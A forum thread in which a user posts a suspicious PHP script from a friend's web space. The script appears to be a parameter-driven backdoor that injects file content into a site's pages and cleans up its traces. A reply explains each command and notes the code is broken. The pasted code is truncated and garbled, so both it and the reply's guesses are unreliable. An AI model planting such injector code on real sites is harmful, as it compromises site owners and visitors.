Skip navigation.
Home

suspect php script

|

Hi

I find this php script in the web space of a friend
I don't understand his target , someone can help me to
understand ? thanks :)

php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
echo " $pt " ;
$fin = file_get_contents($pt);
$fin = ereg_replace("(.*)", "", $fin);
$fin = ereg_replace("(.*)", "", $fin);
$fin = preg_replace('#]+\_lm[^>]*>.*?#is', '', $fin);
$fin = preg_replace("/http(.*?)tmp6(.*?)\/", "", $fin);
$fin = ereg_replace("", "", $fin);
$fin = ereg_replace("", "", $fin);
$fin = ereg_replace("", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
$var = $_POST[$name];

if (isset($_GET[$name]))
$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
$sg = $_POST["sg"];

if (isset($_GET["sg"]))
$sg = $_GET["sg"];

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
$g = $_GET["gm"];

$path = "";
$fr = fopen("1r", "a+");
if (file_exists("c"))
{
$fconf = file("c");
$tname = trim($fconf[0]);
$cname = trim($fconf[1]);
$curs = trim($fconf[2]);
$pid = trim($fconf[3]);
if ($pid == 100)
{
$pid = 0;
$rnd = mt_rand(0, 999);
$nm = "";
for ($i=0; $i";
$endtag = " ";
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// óäàëÿåì çàâåðøàþùèå õòìë òåãè
$fin = preg_replace ("//i", "", $fin);
$fin = preg_replace ("//i", "", $fin);
$fin = ereg_replace("(.*)", "", $fin);
$fin = ereg_replace("(.*)", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
$fc = fgets($fp, 1024);
if (!$fc)
{
exit();
}
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag;
$fin = $fin.$drs;
$fin = $fin.$endtag;
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}

function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
Update();
exit();
}

if (isset($_POST['c']) || isset($_GET['c']))
{
Com();
exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
Gen();
exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
MRepl();
exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
Clear();
exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
Clear2();
exit();
}

echo "";

}

Main();

that script won't run.

that script won't run. there's several } missing, an incomplete for-loop (line 78: - wtf does this mean???),etc. etc. etc.
anyway, what it does or should or whatever:
depending on the parameters with which is is called, it does:

PARAM        FUNCTION
u         (it calls a function which is not defined)
c         (some other non-existent function is called)
g         it reads 2 params, opens a file called "1r", checks if a file named "c" exists (which appears to be some kind of config file), if yes reads it, then does some stupid stuff if the 4th line is "100": it reads a file whose name is defined by the content of another file ("m"), replaces some special characters, and then opens a file called "r". It reads the first 1024 Chars of every line and appends them to a string. this string is appended to the file's content and saved into the same filename. WTF does that do?
s         (another undefined function)
cl        deletes the files "c" "1r" and "log"
cl2       reads a file which is specified by another file's content and prints it onto the screen. then it replaces some stuff and saves it again. last it prints "upt-ok" onto the screen.

In any case, it prints a space as last thing.

Now what the fuck it does really depends on those funny files! (If it is of a budd of your's - what i doubt - just ask him what it does :P )

thanks

thanks for your analysis and your time .